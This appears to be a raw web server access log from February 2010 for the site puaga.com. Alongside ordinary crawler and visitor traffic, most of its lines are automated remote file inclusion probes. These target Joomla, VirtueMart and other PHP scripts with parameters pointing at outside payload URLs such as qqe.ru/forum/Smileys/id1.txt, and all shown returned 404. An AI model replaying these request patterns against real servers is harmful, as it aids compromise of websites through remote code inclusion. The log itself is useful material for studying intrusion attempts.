213.239.230.130 - - [12/Feb/2010:10:59:37 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:10:59:39 -0800] "GET /orange_g/forum/viewtopic.php?p=25361 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
208.43.13.149 - - [12/Feb/2010:11:00:28 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:11:00:43 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET /logs/access_100114.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET /logs/access_100114.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:08 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:14 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:14 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:01:14 -0800] "GET /logs/access_100114.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:11:01:42 -0800] "GET /logs/access.log HTTP/1.0" 200 477338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:02:02 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:02:02 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:02:02 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:02:07 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:03:27 -0800] "GET /logs/access_100119.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:35 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:35 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:03:35 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:03:35 -0800] "GET /logs/access_100119.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:04:08 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:04:08 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:04:08 -0800] "GET /logs/access_100117.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:04:17 -0800] "GET /logs/access_100125.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:11:04:26 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:11:04:26 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:11:04:26 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:04:31 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:04:31 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:04:31 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:04:37 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:05:02 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:05:02 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:05:02 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:05:07 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:11:08:18 -0800] "GET /ideal/forum/viewtopic.php?p=21522 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:11:08:18 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/ideal/forum/viewtopic.php?p=21522" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:11:08:18 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/ideal/forum/viewtopic.php?p=21522" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:20 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:21 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
84.62.70.220 - - [12/Feb/2010:11:08:22 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/style/5.style.css" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.7) Gecko/20100105 SeaMonkey/2.0.2" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:08:23 -0800] "GET /logs/access_100118.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:08:43 -0800] "GET /logs/access_100118.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:09:14 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:09:26 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:09:33 -0800] "GET /logs/write.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:09:33 -0800] "GET /logs/access_100117.log%20%20/write.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:09:34 -0800] "GET /write.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:11:41 -0800] "GET /logs/access_100118.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:12:24 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:12:27 -0800] "GET /logs/access_100114.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.179.83 - - [12/Feb/2010:11:12:44 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.puaga.com"
202.160.180.11 - - [12/Feb/2010:11:13:03 -0800] "GET /ideal/forum/viewtopic.php?p=6148 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.puaga.com"
77.88.23.5 - - [12/Feb/2010:11:13:22 -0800] "HEAD /sitemap.xml HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "puaga.com"
119.63.198.34 - - [12/Feb/2010:11:13:38 -0800] "GET /orange_g/forum/viewtopic.php?p=26506 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "puaga.com"
213.251.189.201 - - [12/Feb/2010:11:14:04 -0800] "GET /logs/access_100117.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:14:06 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:14:06 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:14:07 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:11:14:23 -0800] "GET /logs/access_100125.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:14:25 -0800] "GET /logs/access_100113.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:14:25 -0800] "GET /logs/access_100114.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [12/Feb/2010:11:14:38 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
87.250.252.242 - - [12/Feb/2010:11:14:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.pixero.net"
220.232.237.122 - - [12/Feb/2010:11:15:00 -0800] "GET /logs/access_100111.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:15:22 -0800] "GET /logs/setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:15:22 -0800] "GET /logs/access_100117.log/setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:15:23 -0800] "GET /setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:16:09 -0800] "GET /modules/mod_weather.php?absolute_path=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:16:13 -0800] "GET /logs/setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:16:13 -0800] "GET /logs/access_100117.log/setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:16:13 -0800] "GET /setup.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.252.1.109 - - [12/Feb/2010:11:16:27 -0800] "GET /logs/access_100114.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:11:17:45 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:11:17:45 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:17:49 -0800] "GET /galeria.php?start=0&kategoria=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:17:49 -0800] "GET /logs//galeria.php?start=0&kategoria=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:17:52 -0800] "GET /logs/access_091125.log//galeria.php?start=0&kategoria=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:20:37 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:20:37 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:20:46 -0800] "GET /logs/access_100112.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:11:21:08 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:11:21:09 -0800] "GET /orange_g/forum/viewtopic.php?p=26406 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
